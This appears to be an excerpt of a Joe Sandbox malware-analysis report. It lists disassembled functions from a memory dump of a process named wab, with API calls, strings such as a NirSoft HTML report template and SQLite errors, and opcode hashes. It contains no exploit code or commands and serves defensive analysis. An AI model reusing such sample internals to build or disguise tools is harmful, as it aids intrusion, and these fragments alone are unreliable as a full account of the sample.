• API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
• String ID: caption
• API String ID: 973020956-4135340389
• Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
• Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
• Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
• Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
• <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
• <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
• <table dir="rtl"><tr><td>, xrefs: 00410B00
• <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: memset$_snwprintf$wcscpy
• String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
• API String ID: 1283228442-2366825230
• Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
• Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
• Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
• Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
Uniqueness
Uniqueness Score: -1.00%

APIs
• wcschr.MSVCRT ref: 00413972
• wcscpy.MSVCRT ref: 00413982
  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
• wcscpy.MSVCRT ref: 004139D1
• wcscat.MSVCRT ref: 004139DC
• memset.MSVCRT ref: 004139B8
  • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
  • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
• memset.MSVCRT ref: 00413A00
• memcpy.MSVCRT ref: 00413A1B
• wcscat.MSVCRT ref: 00413A27
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
• String ID: \systemroot
• API String ID: 4173585201-1821301763
• Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
• Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
• Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
• Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: wcscpy
• String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
• API String ID: 1284135714-318151290
• Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
• Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
• Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
• Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
• String ID: 0$6
• API String ID: 4066108131-3849865405
• Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
• Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
• Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
• Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004082EF
                                                                                                                                                                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408362
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408377
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$ByteCharMultiWide
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 290601579-0
                                                                                                                                                                                                                      • Opcode ID: 9fcfede22a014af3fd00fd09d6ecb3c0f5450144b585b651b49c2714cfacc533
                                                                                                                                                                                                                      • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9fcfede22a014af3fd00fd09d6ecb3c0f5450144b585b651b49c2714cfacc533
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memchrmemset
                                                                                                                                                                                                                      • String ID: PD$PD
                                                                                                                                                                                                                      • API String ID: 1581201632-2312785699
                                                                                                                                                                                                                      • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                                                                                                                                      • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 00409FA5
                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2163313125-0
                                                                                                                                                                                                                      • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                                                                      • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@$wcslen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 239872665-3916222277
                                                                                                                                                                                                                      • Opcode ID: eaee59aa1960e0bc6b139c79bf1b9906f069cc1c4e9a2a0e216f6cb737749aeb
                                                                                                                                                                                                                      • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eaee59aa1960e0bc6b139c79bf1b9906f069cc1c4e9a2a0e216f6cb737749aeb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                                                                      • String ID: %s (%s)$YV@
                                                                                                                                                                                                                      • API String ID: 3979103747-598926743
                                                                                                                                                                                                                      • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                                                                                      • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                                                      • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                                                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                                                      • API String ID: 2780580303-317687271
                                                                                                                                                                                                                      • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
• Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
• Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
• Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
• FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
• wcslen.MSVCRT ref: 0040A6B1
• wcscpy.MSVCRT ref: 0040A6C1
• LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
• wcscpy.MSVCRT ref: 0040A6DB
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
• String ID: Unknown Error$netmsg.dll
• API String ID: 2767993716-572158859
• Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
• Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
• Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
• Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
• wcscpy.MSVCRT ref: 0040DAFB
• wcscpy.MSVCRT ref: 0040DB0B
• GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
  • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: PrivateProfilewcscpy$AttributesFileString
• String ID: TranslatorName$TranslatorURL$charset$general$rtl
• API String ID: 3176057301-2039793938
• Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
• Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
• Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
• Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
• attached databases must use the same text encoding as main database, xrefs: 0042F76F
• database is already attached, xrefs: 0042F721
• unable to open database: %s, xrefs: 0042F84E
• database %s is already in use, xrefs: 0042F6C5
• cannot ATTACH database within transaction, xrefs: 0042F663
• out of memory, xrefs: 0042F865
• too many attached databases - max %d, xrefs: 0042F64D
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: memcpymemset
• String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
• API String ID: 1297977491-2001300268
• Opcode ID: 7e4b554c6cf2a7725b65294c40743cfb8927ad1f348c936232134d76ba50cb5c
• Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
• Opcode Fuzzy Hash: 7e4b554c6cf2a7725b65294c40743cfb8927ad1f348c936232134d76ba50cb5c
• Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
• ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
• ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
• memcpy.MSVCRT ref: 0040EB80
• memcpy.MSVCRT ref: 0040EB94
• ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
• ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
• ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
• String ID: ($d
• API String ID: 1140211610-1915259565
• Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
• Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
• Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
• Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
Uniqueness

Uniqueness Score: -1.00%

APIs
• LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
• Sleep.KERNEL32(00000001), ref: 004178E9
• GetLastError.KERNEL32 ref: 004178FB
• UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: File$ErrorLastLockSleepUnlock
• String ID:
• API String ID: 3015003838-0
• Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
• Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
• Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
• Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
Uniqueness

Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00407E44
• memset.MSVCRT ref: 00407E5B
• _mbscpy.MSVCRT ref: 00407E7E
• _mbscpy.MSVCRT ref: 00407ED7
• _mbscpy.MSVCRT ref: 00407EEE
• _mbscpy.MSVCRT ref: 00407F01
• wcscpy.MSVCRT ref: 00407F10
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 59245283-0
                                                                                                                                                                                                                      • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                                                                                                                                      • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041855C
                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041858E
                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$AttributesDeleteErrorLastSleep$??3@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3467550082-0
                                                                                                                                                                                                                      • Opcode ID: a2b6c81e445c0bb2a448697a9242f501ac6bdbc43e5116fd898be029f04e29f8
                                                                                                                                                                                                                      • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a2b6c81e445c0bb2a448697a9242f501ac6bdbc43e5116fd898be029f04e29f8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                                                      • API String ID: 3510742995-3273207271
                                                                                                                                                                                                                      • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                                                      • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413ADC
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413AEC
                                                                                                                                                                                                                        • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413BD7
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                                                                                      • String ID: 3A
                                                                                                                                                                                                                      • API String ID: 3300951397-293699754
                                                                                                                                                                                                                      • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                                                                                      • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                        • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                                                                                                        • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
